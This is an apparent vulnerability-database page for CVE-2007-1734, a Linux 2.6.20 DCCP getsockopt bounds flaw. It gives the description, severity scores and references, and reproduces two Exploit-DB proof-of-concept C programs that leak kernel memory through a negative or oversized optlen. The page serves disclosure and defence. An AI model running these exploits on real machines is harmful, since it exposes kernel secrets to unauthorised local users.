CVE-2007-1734 : Detail

CVE-2007-1734

0.21%V4
Local
2007-03-28
20h00 +00:00
2018-10-16
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The DCCP support in the do_dccp_getsockopt function in net/dccp/proto.c in Linux kernel 2.6.20 and later does not verify the upper bounds of the optlen value, which allows local users running on certain architectures to read kernel memory or cause a denial of service (oops), a related issue to CVE-2007-1730.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 3587

Publication date : 2007-03-26 22h00 +00:00
Author : Robert Swiecki
EDB Verified : Yes

/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw which may allow local users to steal data from the kernel memory. Vulnerable Systems: Linux Kernel Versions: >= 2.6.20 with DCCP support enabled. Kernel versions <2.6.20 lack DCCP_SOCKOPT_SEND_CSCOV/DCCP_SOCKOPT_RECV_CSCOV optnames for getsockopt() call with SOL_DCCP level, which are used in the delivered POC code. Author: Robert Swiecki http://www.swiecki.net robert@swiecki.net Details: The flaw exists in do_dccp_getsockopt() function in net/dccp/proto.c file. ----------------------- static int do_dccp_getsockopt(struct sock *sk, int level, int optname, char __user *optval, int __user *optlen) ... if (get_user(len, optlen)) return -EFAULT; if (len < sizeof(int)) return -EINVAL; ... ----------------------- The above code doesn't check `len' variable for negative values. Because of cast typing (len < sizeof(int)) is always true for `len' values less than 0. After that copy_to_user() procedure is called: ----------------------- if (put_user(len, optlen) || copy_to_user(optval, &val, len)) return -EFAULT; ----------------------- What happens next depends greatly on the cpu architecture in-use - each cpu architecture has its own copy_to_user() implementation. On the IA-32 the code below ... ----------------------- unsigned long copy_to_user(void __user *to, const void *from, unsigned long n) { BUG_ON((long) n < 0); ----------------------- ... will prevent explotation, but kernel will oops due to invalid opcode in BUG_ON(). On some other architectures (e.g. x86-64) kernel-space data will be copied to the user supplied buffer until end-of-kernel space (pagefault in kernel-mode occurs) is reached. POC: ----------------------- */ #include <netinet/in.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <sys/mman.h> #include <linux/net.h> #define BUFSIZE 0x10000000 int main(int argc, char *argv[]) { void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (!mem) { printf("Cannot allocate mem\n"); return 1; } /* SOCK_DCCP, IPPROTO_DCCP */ int s = socket(PF_INET, 6, 33); if (s == -1) { fprintf(stderr, "socket failure!\n"); return 1; } int len = -1; /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ int x = getsockopt(s, 269, 11, mem, &len); if (x == -1) perror("SETSOCKOPT"); else printf("SUCCESS\n"); write(1, mem, BUFSIZE); return 0; } //----------------------- //make poc; ./poc | strings //----------------------- // milw0rm.com [2007-03-27]
Exploit Database EDB-ID : 3595

Publication date : 2007-03-27 22h00 +00:00
Author : Robert Swiecki
EDB Verified : Yes

#include <netinet/in.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <sys/mman.h> #include <linux/net.h> #define BUFSIZE 0x10000000 int main(int argc, char *argv[]) { void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (mem == (void*)-1) { printf("Alloc failed\n"); return -1; } /* SOCK_DCCP, IPPROTO_DCCP */ int s = socket(PF_INET, 6, 33); if (s == -1) { fprintf(stderr, "socket failure!\n"); return 1; } /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ int len = BUFSIZE; int x = getsockopt(s, 269, 11, mem, &len); if (x == -1) perror("SETSOCKOPT"); else printf("SUCCESS\n"); write(1, mem, BUFSIZE); return 0; } // milw0rm.com [2007-03-28]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.20

Linux>>Linux_kernel >> Version 2.6.20.1

Linux>>Linux_kernel >> Version 2.6.20.2

References

http://securityreason.com/securityalert/2511
Tags : third-party-advisory, x_refsource_SREASON
http://www.securitytracker.com/id?1017820
Tags : vdb-entry, x_refsource_SECTRACK
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.